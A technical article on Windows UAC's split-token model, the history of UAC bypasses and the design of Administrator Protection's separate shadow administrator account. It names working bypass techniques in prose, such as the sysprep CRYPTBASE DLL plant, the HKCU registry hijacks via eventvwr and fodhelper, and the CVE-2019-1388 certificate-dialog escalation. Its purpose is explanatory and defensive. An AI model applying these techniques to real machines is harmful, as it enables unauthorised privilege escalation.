Four resources stayed shared between the filtered and full tokens, and four categories of attack grew out of them. Files dropped in a writable directory the elevated process trusts. Registry values planted under HKEY_CURRENT_USER that an elevated binary reads before it consults HKEY_CLASSES_ROOT. COM elevation monikers that hand the attacker an elevated IFileOperation interface. Path-resolution overrides that redirect %SystemRoot% for a single auto-elevating process. The UACMe project [@uacme] catalogues 81 such methods, each one a load against the shared-resource shape of Vista's split token.

Administrator Protection inverts that shape. The elevated administrator becomes a different account with a different security identifier, a different profile directory, a different NTUSER.DAT hive, a different authentication-ID LUID, and a different DOS device object directory under \Sessions\0\DosDevices\. The operating system manages the account itself. It is created on demand the first time the policy is enabled, linked to the primary admin via paired Security Account Manager attributes, used in a fresh logon session for every elevation, and the elevated token is destroyed when the process exits [@ms-developer-blog-2025, @call4cloud-osint].

The feature ships under four names -- Administrator Protection in Microsoft Learn, Adminless as the community shorthand this article uses, ShadowAdmin in the samsrv.dll engineering symbols, System Managed Administrator Account (SMAA) in the Windows Developer Blog [@ms-admin-protection, @ms-developer-blog-2025, @call4cloud-osint] -- and §6 walks each in turn. The launch arc was short: announced at Ignite 2024 by David Weston on November 19, 2024 [@bleepingcomputer-2024], surfaced earlier that fall in Insider Preview build 27718 on October 2, 2024 [@ms-insider-build-27718], shipped to stable Windows in KB5067036 on October 28, 2025 [@ms-kb5067036], and disabled on December 1, 2025 over a WebView2 application-compatibility regression [@forshaw-pz-jan2026, @ms-admin-protection].

This article walks what changed and what did not. By the end you will know exactly which UAC bypass families are dead, exactly which survive, exactly what the December 2025 revert was about, and exactly where the new boundary still leaks. The path runs through twenty years of design tradeoffs and seven years of binary-level fixes that never converged on a real boundary. It runs through nine Project Zero bypasses Microsoft fixed before shipping. It ends at a question Microsoft's own design documents do not yet answer: when the prompt is a credential gate instead of a click-through, what is left for the attacker to do?

The first thing to understand is what UAC was trying to do, and why Microsoft said for twenty years it was not a security boundary.

2. "Convenience, not boundary": UAC as Microsoft conceived it

Why did Vista ship UAC at all? For most of Windows history, every interactive logon for a member of the local Administrators group produced one full-admin token. The desktop shell ran as a full administrator. Every child process inherited those rights. The worm era of 2003 to 2005 demonstrated, repeatedly, that one process running in user context owned the whole machine. By 2006 the cost of admin-by-default had become impossible to defend [@wikipedia-uac].The pre-Vista Limited User Account (LUA) was Microsoft's first attempt at a fix. The conceptual ancestor of the filtered token failed in practice because roughly half of the third-party application base broke under it, and the documented workaround -- RUNAS.EXE -- was operationally hostile enough that almost no one used it.

The redesign that produced UAC pivoted on a single observation. Forcing administrators to run as standard users had failed because too much software assumed admin rights. So Vista would give each admin user two identities. One would be standard-user enough to run the desktop, the browser, and the day-to-day applications without privilege. The other would carry the admin rights, and the operating system would arrange for the user to opt into it on a per-task basis.

Mark Russinovich's June 2007 article Inside Windows Vista User Account Control in TechNet Magazine [@russinovich-2007-vista] remains the canonical reference for the design. The mechanism is two tokens at logon; the integrity-level taxonomy (Low, Medium, High, System) gating object access; file-system and registry virtualisation rerouting writes by legacy apps; and Mandatory Integrity Control enforcing the no-write-up rule at the kernel-object boundary.

The mechanism by which Vista UAC assigns two distinct access tokens to a single interactive logon for a member of the local Administrators group. The Local Security Authority issues both at logon: a filtered standard-user token with most privileges removed and the Administrators group marked as deny-only, and a linked full administrator token referenced from the filtered token's `TokenLinkedToken` field [@ms-uac-how-it-works].

The disclaimer that follows the design is the single most quoted sentence Russinovich ever published about UAC. The article will lift it verbatim once, because every Administrator Protection design decision falls out of its absence:

It's important to be aware that UAC elevations are conveniences and not security boundaries. -- Mark Russinovich, *Inside Windows Vista User Account Control*, TechNet Magazine, June 2007 [@russinovich-2007-vista]

This is not an accidental disclaimer. It is the canonical Microsoft classification, preserved into the Microsoft Security Servicing Criteria document [@msrc-servicing-criteria]. James Forshaw of Google Project Zero, writing in January 2026, re-states the position verbatim: "due to the way it was designed, it was quickly apparent it didn't represent a hard security boundary, and Microsoft downgraded it to a security feature" [@forshaw-pz-jan2026]. The classification is what determined what Microsoft would and would not pay attention to. A "security boundary" gets a security bulletin when an attacker crosses it. A "security feature" does not. A bypass of a boundary is a vulnerability. A bypass of a feature is a quality bug. For twenty years, UAC bypasses were quality bugs.

The two-tokens-at-logon mechanism is the shape from which the entire bypass canon grows. The twenty years of evolution that follow run along a single timeline.

timeline title Privilege separation in Windows, NT 3.1 to Administrator Protection 1993 : NT 3.1 ships multi-user accounts and DACLs but admin-by-default desktop culture 2006 : Vista UAC introduces the split-token model and Mandatory Integrity Control 2009 : Davidson publishes the first UAC bypass; Windows 7 ships auto-elevation 2014 : hfiref0x's UACMe catalogue collects the bypass canon 2016 : enigma0x3 publishes the registry-hijack family (eventvwr, fodhelper, sdclt) 2019 : CVE-2019-1388 (consent.exe certificate dialog) is the lone UAC LPE bulletin 2024 : Insider Preview build 27718 surfaces Administrator Protection; Ignite 2024 announces it 2025 : KB5067036 ships the SMAA on stable Windows, then reverts on December 1 2026 : Forshaw's nine pre-GA bypasses all fixed; the elevation path is now a security boundary

To see why the entire bypass canon grew out of the split-token shape, the next section walks the mechanic at function-name granularity. It is the load-bearing pre-history of everything that comes after.

3. The Vista UAC split-token in detail

The mechanics at logon. The Local Security Authority Subsystem Service (LSASS) validates credentials. For a user in the local Administrators group, it constructs two tokens. The filtered token has its dangerous privileges removed and the Administrators SID marked deny-only; the full token retains them. The Token Manager wires the filtered token's TokenLinkedToken field to a handle on the full token. LSASS hands the filtered token to winlogon.exe. Winlogon launches userinit.exe. Userinit launches explorer.exe. The shell, holding the filtered token, becomes the parent process from which every user-initiated process inherits [@ms-uac-how-it-works].

The kernel structure that connects the filtered standard-user token to the linked full administrator token in Vista's split-token model. A process holding the filtered token can read the `TokenLinkedToken` field via the `GetTokenInformation` API to discover the handle of the full token, and pass that handle to `CreateProcessAsUser` to launch an elevated child. The same link is the structural premise of token-stealing attacks: any code path that can read or impersonate the linked token bypasses the consent UI entirely [@ms-uac-how-it-works, @forshaw-pz-jan2026].

The shell shares four resources with anything launched under the full token.

The same user security identifier. Both tokens carry the same primary SID. Files, registry keys, and kernel objects that grant access to the user grant identical access to both processes.
The same %USERPROFILE% directory tree. C:\Users\<user>\ is the home of both. The Documents folder, the Downloads folder, the AppData hives, and any application-specific subdirectory belong to one user.
The same HKEY_CURRENT_USER hive. Both tokens map HKCU to the same NTUSER.DAT file. An elevated process that reads a user setting reads the value the unelevated user wrote.
The same logon-session LUID. The Locally Unique Identifier that identifies an interactive logon session is the same on both tokens. The kernel uses that LUID as a key for per-logon-session caching: the DOS device object directory at \Sessions\0\DosDevices\<LUID>, drive-letter mappings, mapped network drives, and the credential cache.

The elevation pipeline. A user clicks Yes on a UAC prompt. The mechanism beneath that click runs through a chain of named function calls.

sequenceDiagram participant User as User shell (filtered token) participant AppInfo as appinfo.dll (Application Information service) participant Consent as consent.exe (secure desktop) participant LSA as LSASS participant New as Elevated child process

User->>AppInfo: ShellExecute / CreateProcess "as admin"
AppInfo->>AppInfo: RAiLaunchAdminProcess RPC
AppInfo->>AppInfo: Read manifest requestedExecutionLevel
AppInfo->>AppInfo: Check ConsentPromptBehaviorAdmin
AppInfo->>Consent: Launch consent.exe on Winlogon desktop
Consent->>User: Show Yes / No prompt
User-->>Consent: Click Yes
Consent-->>AppInfo: Approved
AppInfo->>LSA: Resolve TokenLinkedToken handle
AppInfo->>New: CreateProcessAsUser(linked full token)
Note over New: Same SID and profile and HKCU and logon session
Note over New: Integrity level High

The prompt runs on the secure desktop, the same Winlogon-owned Winsta0\Winlogon desktop where the credential-entry dialog appears at logon, not the user's interactive Winsta0\Default desktop [@ms-uac-how-it-works]. User Interface Privilege Isolation (UIPI) blocks lower-integrity input from reaching higher-integrity windows; the secure-desktop switch is its first defence against synthetic-keystroke attacks against the prompt itself.The secure desktop is not invulnerable. It changes the integrity-isolation context, but a process holding the filtered token can still trigger the switch (that is the whole point of clicking Yes), and code running before the switch can in principle modify the surrounding UI state. CVE-2019-1388 in late 2019 turned out to exploit a different aspect entirely -- a UI-interaction path through the consent.exe certificate-viewer dialog -- and not the secure-desktop switch itself.

Compare this to what comes next. Both tokens share four resources. Each of those resources is a category of attack waiting for a researcher to find it. The next section is the story of what happened when Microsoft tried to make UAC less annoying by silently elevating its own Microsoft-signed binaries -- and what the bypass canon did with the change.

4. Windows 7 auto-elevation and the birth of the bypass canon

A specific moment. December 2009. Leo Davidson publishes Windows 7 UAC whitelist: Code-injection Issue / Anti-Competitive API / Security Theatre on pretentiousname.com [@davidson-2009]. The title is the argument. The page itself is sprawling, contentious, and on a few key technical points exactly right. Microsoft's response, in Davidson's own words: "this is a non-issue, and ignored my offers to give them full details for several months." Microsoft Security Essentials eventually classified the binary (not the technique) as HackTool:Win32/Welevate.A and HackTool:Win64/Welevate.A; in Davidson's pointed observation, "recompiling the binaries in VS2010 means they are no longer detected" [@davidson-2009].Davidson kept writing into his original page over the following decade. A marker buried inside the text reads "As I was typing more words into this page, this appeared in my text editor at the 10,000th word!" In March 2020 he removed the proof-of-concept binaries, noting "I got sick of the page being marked as malware, even by Google (FFS)." The prose remains the canonical first source on UAC bypasses [@davidson-2009].

What Windows 7 added, in October 2009, to fix Vista's prompt-fatigue problem [@russinovich-2009-win7]:

The autoElevate=true manifest attribute, embedded in selected Microsoft-signed Windows binaries.
An internal whitelist of Microsoft-signed binaries living under %SystemRoot%\System32.
The COM Elevation Moniker -- already shipping in Vista (BIND_OPTS3, syntax Elevation:Administrator!new:<CLSID>) -- was the activation primitive. Windows 7 extended implicit auto-elevation to qualifying COM servers whose registrations matched the new whitelist criteria, so callers such as IFileOperation, ICMLuaUtil, and IColorDataProxy could be launched elevated without a consent prompt under the Win7 model [@russinovich-2009-win7, @uacme]. The dedicated registry-curation surface, the COMAutoApprovalList (HKLM\Software\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList) that UACMe Method 49 references verbatim, did not ship in Windows 7; it was introduced seven years later in Windows 10 RS1 (build 14393, August 2016) as a Redstone-1 hardening that replaced implicit COM auto-elevation with explicit list curation [@uacme].
The default consent-prompt behaviour ConsentPromptBehaviorAdmin = 5: prompt for consent for non-Windows binaries [@russinovich-2009-win7].

The Windows 7 mechanism by which selected Microsoft-signed binaries elevate without showing the consent prompt to a user who is a member of the local Administrators group. The Application Information service consults a whitelist of signature, path, and manifest attributes; if the binary qualifies, `appinfo.dll` calls `CreateProcessAsUser` with the linked full token and no UI step at all [@russinovich-2009-win7]. A COM activation syntax introduced in Windows Vista that lets an unelevated caller request an elevated instance of a COM server class. The `IBindCtx` is augmented with a `BIND_OPTS3` structure carrying a window handle to attribute the prompt to. The bind moniker `Elevation:Administrator!new:<CLSID>` causes the COM Service Control Manager to launch the server elevated. UACMe methods that target `IFileOperation`, `ICMLuaUtil`, and `IColorDataProxy` all descend from this mechanism [@russinovich-2009-win7, @uacme].

Davidson's technique against the new whitelist is one paragraph of detail. Use the IFileOperation COM elevation moniker, which itself auto-elevates, to write a planted CRYPTBASE.DLL into %SystemRoot%\System32\sysprep\. The path is a writable destination from the limited token because IFileOperation runs elevated. Then launch sysprep.exe, which is auto-elevated as a Microsoft-signed binary in System32. Sysprep loads CRYPTBASE.DLL from its own directory before the system path. The attacker's DLL runs at High integrity in the elevated sysprep process [@davidson-2009, @uacme]. No prompt. The whitelist did the work.

The bypass canon. Davidson's technique was the start, not the totality. The successors walked the same shape across families.

The DLL side-load family. Sysprep was the canonical instance. Subsequent variants targeted cliconfg.exe, mcx2prov.exe, migwiz.exe, and setupsqm.exe -- each an auto-elevating Microsoft binary that loaded a DLL from a writable directory before consulting the system path. Microsoft removed the auto-elevation attribute from many of these binaries over the Windows 10 1709 cycle, but did so one binary at a time [@uacme].
The registry-hijack family. Matt Nelson's August 2016 disclosure of an eventvwr.exe plus HKCU\Software\Classes\mscfile\shell\open\command bypass [@enigma0x3-2016-eventvwr] established the pattern. An auto-elevating binary consults HKEY_CURRENT_USER before HKEY_CLASSES_ROOT for a value the binary trusts to dispatch a child process. The limited user, who owns HKCU, writes whatever they want into the value. The elevated binary executes the attacker's command line. March 2017 produced sdclt.exe plus App Paths [@enigma0x3-2017-app-paths] and sdclt.exe plus IsolatedCommand [@enigma0x3-2017-sdclt]; May 2017 produced the fodhelper.exe plus ms-settings variant [@uacme]. All fileless. All generalising to any auto-elevating binary that walks HKCU before HKCR.
The COM-elevation-moniker abuse family. UACMe's Method 1 (Davidson's original IFileOperation) ages into Methods 41 (ICMLuaUtil, Oddvar Moe, via ucmCMLuaUtilShellExecMethod) and 43 (IColorDataProxy paired with ICMLuaUtil, Oddvar Moe derivative, via ucmDccwCOMMethod), each one a different COM interface that auto-elevates and exposes a method useful for arbitrary file or registry write [@uacme].
The environment-variable and path-poisoning family. Per-process %windir% or %SystemRoot% redirection via registry shims and Image File Execution Options, redirecting auto-elevating binaries to load resources from attacker-controlled directories.

Key idea: The Windows 7 auto-elevation whitelist was the bypass. The day Microsoft shipped a class of binaries that could elevate silently based on signing and path, the entire problem of UAC bypass reduced to "make one of those binaries do something the attacker wants it to do." Every UACMe method that targets a Microsoft-signed binary in System32 descends from this design choice. The 81-method catalogue is not a list of separate vulnerabilities; it is one architectural mistake spreading through the binary inventory.

Enter hfiref0x's UACMe [@uacme]. The project has been on GitHub since 2014. It currently lists 81 named methods. Each entry pairs the method number with the author credit, the target binary, the technique class, and the "Fixed in" build number. The README, taken together, is the institutional memory of UAC's failure as a boundary. Forshaw's January 2026 framing is the operational summary: "A good repository of known bypasses is the UACMe tool which currently lists 81 separate techniques for gaining administrator privileges" [@forshaw-pz-jan2026].

Microsoft chose to fix individual bypasses rather than redesign the model. The next section asks whether seven years of fixes ever caught up.

5. 2017-2024: incremental hardening, no convergence

The middle Windows 10 era was the moment Microsoft treated UAC bypasses as a quality problem and shipped fixes at quality-fix cadence, not security-bulletin cadence. The work was real, but it was always one binary or one interface at a time.

The named milestones, kept short.

Windows 10 1709 (October 2017). Beginning with this build, IFileOperation auto-elevation for callers other than Explorer was restricted [@uacme]. The originating Davidson 2009 family of bypasses, against the sysprep + planted-CRYPTBASE shape, ceased to function for processes other than the shell itself.
Tighter appinfo.dll manifest parsing across multiple Windows 10 builds. Stricter binary-signature checks. Stricter path checks. Stricter manifest checks. Each of these closed individual bypass methods; none of them closed a family.
Per-binary hardening recorded in UACMe's "Fixed in" column. UACMe version 3.5.0 retired roughly eighty percent of the 2014-vintage catalogue as obsolete; the v3.2.x branch retains the full historical record. The project's README warns that "since version 3.5.0, all previously 'fixed' methods are considered obsolete and have been removed. If you need them, use v3.2.x branch" [@uacme].
CVE-2019-1388 (November 2019; reporter: Eduardo Braun Prado via Trend Micro's Zero Day Initiative). The lone departure from the "UAC bypasses get no CVE" rule. A UI-interaction path through consent.exe's certificate-viewer dialog: an unsigned application could trigger consent.exe to display a certificate dialog whose "View Certificate" link launched Internet Explorer running as NT AUTHORITY\SYSTEM, and IE's File menu opened cmd.exe at the same integrity level [@nvd-cve-2019-1388]. Microsoft fixed it on the November 2019 Patch Tuesday and gave it an LPE bulletin.

CVE-2019-1388 was a prompt-UI bug -- specifically, a crash-path that surfaced an IE process at SYSTEM integrity via the certificate viewer -- not a UAC-bypass bug in the categorical sense. The classification distinction matters: Microsoft did not change its position that UAC was not a boundary; the bulletin treated this as a separate UI defect that incidentally crossed the boundary. CISA later added the CVE to the Known Exploited Vulnerabilities Catalog [@nvd-cve-2019-1388].

The accumulating evidence by 2024 was three observations.

UACMe's catalogue has grown from its 2014 origins to 81 methods today [@uacme]. Each family of attack survived the individual fixes. As Davidson predicted in 2009, the auto-elevation whitelist was the structural problem; patching each whitelisted binary as a separate bug was a treadmill, not a convergence.

Microsoft's own Security Servicing Criteria continued to classify UAC as a security feature, not a boundary, throughout the period [@msrc-servicing-criteria, @forshaw-pz-jan2026]. The decision was load-bearing. Fixing the elevation pipeline at quality cadence meant accepting that bypasses would appear quarterly and would not appear in the Patch Tuesday bulletins until the day Microsoft changed its mind about the classification.

The third piece of evidence is what the attackers were doing while the defenders were churning the binary list. Microsoft's own number, quoted by the Windows Developer Blog from the Microsoft Digital Defense Report 2024, is 39,000 token-theft incidents per day [@ms-developer-blog-2025]. A token, once stolen from an elevated process, requires no further bypass: it is a bearer credential good for the lifetime of the logon session. The same logon session is the one the unelevated user and the elevated process share under the split-token model. The "one logon session" property of UAC's design is the structural premise that token theft depends on.

There is one further thread worth naming here. Forshaw's broader 2022 Kerberos work in the user-credential-delegation space is a thread that survives the elevation-redesign question entirely. The May 2022 Exploiting RBCD using a normal user account post [@forshaw-2022-rbcd] is the representative artifact. Network-credential delegation primitives -- Resource-Based Constrained Delegation, User-to-User Kerberos, S4U2Self -- operate at a layer beneath token-level elevation, and survive even a perfect SMAA design because they do not run through the elevation path at all.

Piecewise fixes never converged on a boundary. The question that drove the next five years of Microsoft work was the obvious one: if the issue is the shared-resource model itself, what is the smallest plausible change that fixes it?

6. The breakthrough: the System Managed Administrator Account

The load-bearing design decision is one sentence. Stop trying to make one user account play both roles. The elevated administrator should be a different account with a different SID, a different profile, a different HKCU, a different logon session, and a different DOS device object directory -- and the operating system should manage that account itself.

What is striking about the design is how prosaic the underlying mechanism is. Multi-user accounts have shipped with Windows NT since version 3.1 in 1993. The architecture for running an elevated process under a separate local user has been present in NT for thirty-three years. What changed is that Microsoft finally chose to enforce the multi-user model for privilege separation, by making the operating system itself create and manage the second account, link it to the primary admin via paired Security Account Manager attributes, and use it for every elevation. The sophistication is in linkage, in lifecycle, and in removing auto-elevation, not in any single new primitive.

Note: The thing that changes between UAC and Administrator Protection is not the elevation mechanism (a manifest, a prompt, a CreateProcessAsUser call) but the elevation classification. An elevation bypass used to be a quality bug. It is now a security-bulletin vulnerability. Every Administrator Protection design decision -- separate account, fresh logon session, removed auto-elevation, Hello-gated consent -- is a consequence of the classification change.

The names. Microsoft Learn's term is Administrator Protection [@ms-admin-protection]. Microsoft's announcement material at Ignite 2024 and in the Insider Preview build 27718 post uses the same "Administrator Protection" label [@ms-insider-build-27718]; Adminless is the community shorthand that stuck. The internal engineering term in samsrv.dll (the Security Account Manager service DLL) is ShadowAdmin [@call4cloud-osint]. The Windows Developer Blog's canonical term for the underlying entity is the System Managed Administrator Account (SMAA) [@ms-developer-blog-2025].

The hidden local user account that Windows creates per primary administrator when the `TypeOfAdminApprovalMode` policy is set to 2. The SMAA has its own random user name (typically `ADMIN_`), its own SID, its own profile directory under `C:\Users\ADMIN_\`, its own `NTUSER.DAT` and therefore its own `HKCU`, and its own membership in the local Administrators group. The operating system uses it to host elevated processes; the user never logs into it directly [@ms-developer-blog-2025, @call4cloud-osint].

The SMAA lifecycle. Four beats. Each anchored to a verified source.

Provisioning. When TypeOfAdminApprovalMode = 2 is set under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System (either by Group Policy or by the Intune Settings Catalog), samsrv.dll's ShadowAdminAccount::CreateShadowAdminAccount runs once per existing local-administrator account. CreateRandomShadowAdminAccountName produces an ADMIN_<random> name. AddAccountToLocalAdministratorsGroup adds the new account to the Administrators group. Accounts managed by Windows LAPS (Local Administrator Password Solution) are skipped; their lifecycle is owned by a different subsystem and Microsoft did not want the SMAA mechanism to fight LAPS rotation [@call4cloud-osint].

Linking. Two paired SAM attributes encode the trust relationship between the two accounts. The primary admin's user record gets a ShadowAccountForwardLinkSid attribute pointing at the SMAA's SID. The SMAA's user record gets a ShadowAccountBackLinkSid attribute pointing back at the primary admin. These two attributes are the only structural relationship between the two accounts; everything else -- profile, HKCU, group memberships -- is independent [@call4cloud-osint].

Two paired SAM-database attributes that encode the trust relationship between a primary admin user and its System Managed Administrator Account. The forward link sits on the primary admin's record and points at the SMAA's SID. The back link sits on the SMAA's record and points back at the primary admin. The Application Information service uses the forward link at elevation time to resolve which SMAA to launch the elevated process under [@call4cloud-osint]. The registry value under `HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System` that selects the elevation policy. Value 0 disables UAC. Value 1 selects classic Admin Approval Mode (the Vista / Win7 / Win10 split-token behaviour). Value 2 selects Admin Approval Mode with Administrator Protection: every elevation routes through the SMAA path. The value is set by Group Policy ("User Account Control: Configure type of Admin Approval Mode") or by an Intune Settings Catalog policy and requires a reboot to take effect [@ms-admin-protection, @call4cloud-osint].

Per-elevation use. appinfo.dll's RAiLaunchAdminProcess RPC endpoint reads TypeOfAdminApprovalMode. When the value is 2, it walks the forward link to find the calling user's SMAA, launches consent.exe on the secure desktop in credential prompt mode (not Yes/No), authenticates the primary user via Windows Hello (PIN, fingerprint, face, or password fallback), asks the kernel to ask LSA for a fresh primary token for the SMAA in a brand-new logon session, and calls CreateProcessAsUser with that token, the user's requested executable, and the SMAA's profile environment [@ms-developer-blog-2025, @ms-admin-protection, @forshaw-pz-jan2026]. The credential-less LSA logon at the heart of step three of this beat is walked in §7.

Teardown. When the elevated process exits, the SMAA's token handle goes out of scope. The logon session is reaped. The elevated profile directory remains on disk at C:\Users\ADMIN_<random>\ -- it has to, to preserve per-elevation user state across reboots -- but the live admin token does not. There is no persistent High-integrity process running between elevations [@ms-developer-blog-2025].

flowchart TD Start[Policy enabled: TypeOfAdminApprovalMode = 2] --> Provision Provision[samsrv.dll: CreateShadowAdminAccount per local admin] --> Naming Naming[CreateRandomShadowAdminAccountName -> ADMIN_random] --> AddGroup AddGroup[AddAccountToLocalAdministratorsGroup] --> Link Link[SAM linkage: ShadowAccountForwardLinkSid /
ShadowAccountBackLinkSid] --> Idle[SMAA exists, no token live] Idle -->|Each elevation| RPC[appinfo.dll: RAiLaunchAdminProcess] RPC --> Prompt[consent.exe: Hello credential prompt] Prompt --> LSA[Kernel asks LSA: credential-less logon for SMAA] LSA --> Run[CreateProcessAsUser with SMAA token] Run -->|Process exits| Teardown[Token handle released;
logon session reaped] Teardown --> Idle Windows creates a temporary isolated admin token to get the job done. This temporary token is immediately destroyed once the task is complete, ensuring that admin privileges do not persist. -- David Weston, Microsoft Ignite 2024 keynote, November 19, 2024 [@bleepingcomputer-2024]

Key idea: The single design decision behind Administrator Protection: the elevated and unelevated halves of an administrator must be different accounts. Different SID, different profile, different HKCU, different logon session, different DOS device object directory. The shared-resource attacks of the UAC bypass canon cannot persist if there are no shared resources.

The mechanism is now described. The next section walks it at function-name granularity for a single elevation, end to end -- and in particular, the credential-less LSA logon at step six that does the load-bearing work of minting the SMAA token without any SMAA credential.

7. The elevation pipeline end to end

Walk a single elevation. Nine steps.

The caller invokes ShellExecute or CreateProcess with an elevation request. For the shell-launched case the user right-clicks an executable and selects "Run as administrator"; the same RPC endpoint serves manifest-declared requestedExecutionLevel = "requireAdministrator" callers and Elevation:Administrator!new:<CLSID> COM moniker requests.
appinfo.dll's RAiLaunchAdminProcess RPC endpoint, hosted inside the Application Information service in svchost.exe, receives the call [@ms-uac-how-it-works].
appinfo reads HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\TypeOfAdminApprovalMode.
If the value is 2 (Admin Approval Mode with Administrator Protection), appinfo reads the calling user's SAM record, locates the ShadowAccountForwardLinkSid attribute, and validates the corresponding ShadowAccountBackLinkSid on the SMAA's SAM record. The linkage check is what binds a given elevated process to a given primary user; without both attributes pointing at each other, the elevation is refused [@call4cloud-osint].
appinfo launches consent.exe on the secure desktop in credential prompt mode rather than the classic Yes/No mode. The prompt asks the primary user to authenticate via Windows Hello (PIN, fingerprint, face, or password fallback), not the SMAA. The SMAA has no human credentials. The Windows Developer Blog states the property explicitly [@ms-developer-blog-2025], and Forshaw's January 2026 post restates it in operational terms: "The user does not need to know the credentials for the shadow administrator as there aren't any. Instead UAC can be configured to prompt for the limited user's credentials, including using biometrics if desired" [@forshaw-pz-jan2026].
On a positive Hello result, appinfo.dll -- running as NT AUTHORITY\SYSTEM inside the Application Information service -- asks the kernel to ask LSA for a fresh primary access token for the SMAA's SID in a brand-new logon session. The LSA logon is credential-less. The kernel asks LSA to authenticate "a new instance of the shadow administrator," and LSA fulfils the request without any SMAA credential because the SMAA has no credential to verify. The trust architecture mirrors the way the Service Control Manager asks LSA for service-account tokens: SCM is trusted to ask for the token; LSA mints it on the strength of the request rather than on the strength of any credential. In Administrator Protection, appinfo.dll is the trusted requester, and its request is gated on the user-side Hello result it received in step 5. The Forshaw verbatim that anchors the mechanism is below this section [@forshaw-pz-jan2026, @ms-developer-blog-2025].
appinfo calls CreateProcessAsUser with the SMAA token, the user's requested executable, and the SMAA's profile environment block (USERPROFILE=C:\Users\ADMIN_<random>, USERNAME=ADMIN_<random>, the SMAA's NTUSER.DAT mapped as HKCU).
The new process loads at High integrity, holding the SMAA's primary token, in a fresh logon session with a freshly minted authentication-ID LUID. The DOS device directory at \Sessions\0\DosDevices\<LUID> does not yet exist; the kernel will create it on first reference.
Subsequent SeAccessCheck calls on system objects evaluate against the SMAA's local Administrators group membership and succeed. The elevated process can write to HKLM, modify program files, install services, load WHQL-signed drivers (subject to App Control for Business and HVCI), and otherwise behave as a member of the Administrators group [@ms-developer-blog-2025].

The mechanism by which the Local Security Authority mints a primary access token for the SMAA without verifying any SMAA credential. `appinfo.dll`, running as `NT AUTHORITY\SYSTEM` inside the Application Information service, requests the logon on the SMAA's behalf after the primary user has succeeded against the Hello credential gate. LSA fulfils the request because the *requester* is trusted; the architecture mirrors the way the Service Control Manager requests service-account tokens. The "credential-less" label is descriptive of the SMAA side of the exchange: the SMAA never has a human credential to verify, so LSA cannot and does not ask for one [@forshaw-pz-jan2026, @ms-developer-blog-2025].

The trust architecture is not new in Administrator Protection. The Service Control Manager has asked LSA for service-account tokens since Windows NT 3.1 in 1993; LSA accepts the request because SCM is the trusted requester, not because the service account presented a credential. Administrator Protection generalises the same pattern to elevation: appinfo.dll is the trusted requester, and the SMAA is its functional analogue of a service account. What is new is the user-side gate -- the trusted requester only makes the request after a positive Hello result on the primary user's credential.

in Administrator Protection the kernel calls into the LSA and authenticates a new instance of the shadow administrator. This results in every token returned from `TokenLinkedToken` having a unique logon session, and thus does not currently have the DOS device object directory created. -- James Forshaw, *Bypassing Windows Administrator Protection*, Google Project Zero, January 26, 2026 [@forshaw-pz-jan2026]

The "unique logon session" property in Forshaw's quote is exactly the structural property the lazy-DOS-device-directory bypass exploits, and §12 walks that exploit in full. For now, the load-bearing observation is the credential-less logon itself: the SMAA token is real, the logon session is real, the integrity level is real, but no SMAA credential ever changes hands. The trust is in the requester, gated by a Hello gesture from the primary user.

sequenceDiagram participant User as User shell (primary admin filtered token) participant AppInfo as appinfo.dll (NT AUTHORITY\SYSTEM) participant SAM as samsrv.dll / SAM database participant Consent as consent.exe (secure desktop) participant Hello as Windows Hello / TPM participant LSA as LSASS participant Elev as Elevated SMAA process

User->>AppInfo: ShellExecute "as admin"
AppInfo->>AppInfo: RAiLaunchAdminProcess RPC
AppInfo->>AppInfo: Read TypeOfAdminApprovalMode = 2
AppInfo->>SAM: Resolve ShadowAccountForwardLinkSid
SAM-->>AppInfo: SMAA SID + backlink check OK
AppInfo->>Consent: Launch consent.exe (credential mode)
Consent->>Hello: Request Hello gesture for primary user
Hello-->>Consent: PIN / biometric / password verified
Consent-->>AppInfo: Approved
AppInfo->>LSA: Credential-less logon for SMAA (trusted-requester pattern)
LSA-->>AppInfo: Fresh SMAA primary token and fresh LUID
AppInfo->>Elev: CreateProcessAsUser with SMAA token and profile
Note over Elev: Different SID and USERPROFILE and HKCU and LUID
Note over Elev: Integrity level High -- DOS device dir not yet created

A practical illustration of the shift, displayed as the diff between the pre-AP and post-AP elevated console session.

{` // Modelled output of 'whoami /all' run from an elevated console. // Before: TypeOfAdminApprovalMode = 1 (classic UAC). // After: TypeOfAdminApprovalMode = 2 (Administrator Protection).

const before = { user: 'CONTOSO\\alice', sid: 'S-1-5-21-123456789-987654321-1122334455-1001', profile: 'C:\\Users\\alice', authId: '0x3e7:0x000abcde', integrity: 'S-1-16-12288 (High)', groups: ['BUILTIN\\Administrators (Enabled)'] };

const after = { user: 'WIN11-PC\\ADMIN_9f2c7e1bdc4a8033', sid: 'S-1-5-21-123456789-987654321-1122334455-1051', profile: 'C:\\Users\\ADMIN_9f2c7e1bdc4a8033', authId: '0x3e7:0x000abf42', integrity: 'S-1-16-12288 (High)', groups: ['BUILTIN\\Administrators (Enabled)'], shadowBacklink: 'CONTOSO\\alice' };

console.log('Different user name:', before.user !== after.user); console.log('Different SID:', before.sid !== after.sid); console.log('Different profile:', before.profile !== after.profile); console.log('Different LUID:', before.authId !== after.authId); console.log('Same integrity:', before.integrity === after.integrity); `}

The pipeline is now a single chain of named function calls. The next section asks what changed about the four shared-resource properties from §3, and which UAC-bypass family each fix forecloses.

8. The four shared-resources fixes, precisely

Each of the four shared resources from §3 maps to a precise Administrator Protection fix, and each fix maps to a named UAC-era attack class it forecloses.

Shared resource (UAC)	Administrator Protection fix	UAC-era attack class foreclosed
Same SID across both tokens	SMAA has its own SID; no shared user identity	Same-user file and registry ACE confusion
Same `%USERPROFILE%`	SMAA has `C:\Users\ADMIN_<random>\`	DLL side-load family (sysprep / CRYPTBASE)
Same `HKCU` hive	SMAA has its own `NTUSER.DAT`	Registry-hijack family (eventvwr, fodhelper, sdclt)
Same logon-session LUID	SMAA gets a fresh LUID per elevation	Token-theft via `TokenLinkedToken`; logon-session DOS device hijack

Profile separation. The SMAA owns its own %USERPROFILE% directory tree under C:\Users\ADMIN_<random>\. Files created by elevated processes land there by default. Library folder divergence is the most visible consequence: an elevated Notepad's File > Save dialog opens at the SMAA's Documents, not the primary user's. The primary user cannot see those files in their own Explorer without explicit cross-profile navigation. The structural property that closes is the writable-shared-directory premise of the Davidson 2009 DLL side-load family. Sysprep + CRYPTBASE was a profile-shared attack; without a shared profile, the elevated binary searches a different directory tree from the one the limited user can write to [@ms-developer-blog-2025].

